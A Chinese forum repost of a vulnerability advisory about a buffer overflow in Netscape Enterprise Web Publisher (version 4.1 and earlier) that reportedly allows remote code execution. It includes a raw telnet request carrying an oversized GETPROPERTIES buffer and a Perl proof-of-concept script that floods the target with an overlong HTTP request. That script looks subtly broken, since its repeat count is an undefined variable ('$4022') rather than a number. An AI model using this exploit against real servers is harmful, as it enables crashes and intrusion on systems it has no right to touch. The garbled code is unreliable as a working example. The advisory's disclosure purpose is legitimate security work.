发信人: swak() 
整理人: williamlong(2001-07-16 15:09:44), 站内信件
 | 
 
 
Netscape Enterprise Web Publisher 缓冲溢出
 整理:swak
 发布日期:11/5/2001
 漏洞级别:高(可恶意执行SYSTEM级代码)
 受影响系统:Netscape Enterprise 4.1 与早期版本
 
 描述:
 NETSCAPE的WEB PUBLISHER功能可被缓冲溢出攻击。通过发送一个包含有可执行代
 
 码的缓冲段及新的重定向指针,攻击者便可获得被攻击主机的SHELL。
 
 缓冲溢出存在于PUBLISHER对URI(统一资源签别)上。通过指定GETPROPERTIES,
 
 GETATTRIBUTENAMES等一些NETSCAPE PUBLISHER特有的方法,便可将代码写入含有
 
 此漏洞的主机。
 
 例子:
 C:\>telnet www.example.com 80
 Connecting To www.example.com... connected.
 GETPROPERTIES /(buffer) HTTP/1.1
 Host: Hostname
 (enter)
 (enter)
 
 此处输入约2000个字符。
 
 攻击代码:仅用于测试,后果自负。
 
 
 
 #!/usr/bin/perl
 use IO::Socket;
   if (@ARGV < 2) {
      print "Usage: host port\n";
      exit;
    }
 #超长字符溢出
 $overflow = "A" x $4022;
 &connect;
 sleep(15);
 &connect;
 exit;
 ################################################
 sub connect() {
   $sock= IO::Socket::INET->new(Proto=>"TCP",
      PeerAddr=>$ARGV[0],
      PeerPort=>"$ARGV[1]",)
      or die "Cant connect to $ARGV[0]: $!\n";
   $sock->autoflush(1);
   print $sock "$overflow /index.html HTTP/1.0\n\n";
   $response=<$sock>;
   print "$response";
   while(<$sock>){
      print "$_\n";
   }
   close $sock;
 }
 
 漏洞补丁:
 
 http://iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html
 
 漏洞发布者:
 Riley Hassell ([email protected])
 
 
  | 
 
 
 |